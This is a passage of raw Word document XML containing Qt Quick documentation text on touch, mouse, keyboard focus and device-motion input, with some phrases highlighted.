        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Allowing users to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>physically touch a screen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to interact with an application is a popular </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user-interface paradigm</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on portable devices like smartphones and tablets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick was designed specifically with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>touch-driven user-interfaces in mind</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and thus </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>touch events are supported</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in various visual object types, from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2192" w:history="1">
        <w:r w:rsidRPr="00CF3A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Flickable</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lists to the generic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2193" w:history="1">
        <w:r w:rsidRPr="00CF3A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MultiPointTouchArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type, as well as in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2194" w:history="1">
        <w:r w:rsidRPr="00CF3A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type (which will be documented thoroughly in a proceeding section).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1831" w:name="mouse"/>
      <w:bookmarkStart w:id="1832" w:name="_Toc483000927"/>
      <w:bookmarkStart w:id="1833" w:name="_Toc483003918"/>
      <w:bookmarkStart w:id="1834" w:name="_Toc483604270"/>
      <w:bookmarkStart w:id="1835" w:name="_Toc483605490"/>
      <w:bookmarkEnd w:id="1831"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mouse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1832"/>
      <w:bookmarkEnd w:id="1833"/>
      <w:bookmarkEnd w:id="1834"/>
      <w:bookmarkEnd w:id="1835"/>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mouse input is another important user input for user interfaces. Detecting and reacting to clicks and presses according to the mouse cursor position is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fundamental concept in user-interface design</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick provides the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2195" w:history="1">
        <w:r w:rsidRPr="00CF3A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">visual object type which automatically receives mouse events (including </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clicks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wheel events</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) which allows developers to create </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>custom user-interface objects to handle mouse input</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Please see the documentation about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2196" w:history="1">
        <w:r w:rsidRPr="00CF3A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>mouse events in Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information on the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1836" w:name="keyboard-input-and-keyboard-focus"/>
      <w:bookmarkStart w:id="1837" w:name="_Toc483000928"/>
      <w:bookmarkStart w:id="1838" w:name="_Toc483003919"/>
      <w:bookmarkStart w:id="1839" w:name="_Toc483604271"/>
      <w:bookmarkStart w:id="1840" w:name="_Toc483605491"/>
      <w:bookmarkEnd w:id="1836"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keyboard Input and Keyboard Focus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1837"/>
      <w:bookmarkEnd w:id="1838"/>
      <w:bookmarkEnd w:id="1839"/>
      <w:bookmarkEnd w:id="1840"/>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Supporting input from a keyboard is a </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vital component of the user interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of many applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any visual item can receive keyboard input through the</w:t>
      </w:r>
      <w:r w:rsidR="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2197" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Keys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Additionally, the issue of</w:t>
      </w:r>
      <w:r w:rsidR="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keyboard focus</w:t>
      </w:r>
      <w:r w:rsidR="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">arises when </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multiple items are required to receive key events</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as these events must be passed to the correct item. See the documentation about</w:t>
      </w:r>
      <w:r w:rsidR="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2198" w:history="1">
        <w:r w:rsidRPr="00CF3A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Keyboard focus in Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information on this topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick also </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides visual text items</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which automatically receive keyboard events and key-presses, and displays the appropriate text. See the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2199" w:history="1">
        <w:r w:rsidRPr="00CF3A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>text input</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for in-depth information on the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1841" w:name="device-motion-gestures"/>
      <w:bookmarkStart w:id="1842" w:name="_Toc483000929"/>
      <w:bookmarkStart w:id="1843" w:name="_Toc483003920"/>
      <w:bookmarkStart w:id="1844" w:name="_Toc483604272"/>
      <w:bookmarkStart w:id="1845" w:name="_Toc483605492"/>
      <w:bookmarkEnd w:id="1841"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Device Motion Gestures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1842"/>
      <w:bookmarkEnd w:id="1843"/>
      <w:bookmarkEnd w:id="1844"/>
      <w:bookmarkEnd w:id="1845"/>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Detecting </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>device gestures with an accelerometer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>through camera-based gesture recognition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, can allow users to int</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eract with an application without requiring their full and undevided attention</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It can also provide a </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>more interactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>engaging experience</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick itself does </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not offer first-class support</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for physical device motion gestures; however, the</w:t>
      </w:r>
      <w:r w:rsidR="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2200" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Sensors</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module provides</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> QML types with support for such gestures. See the</w:t>
      </w:r>
      <w:r w:rsidR="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2201" w:history="1">
        <w:r w:rsidRPr="00CF3A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Sensors</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module documentation for more information on the topic.</w:t>
      </w:r>
      <w:r w:rsidR="009210E8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
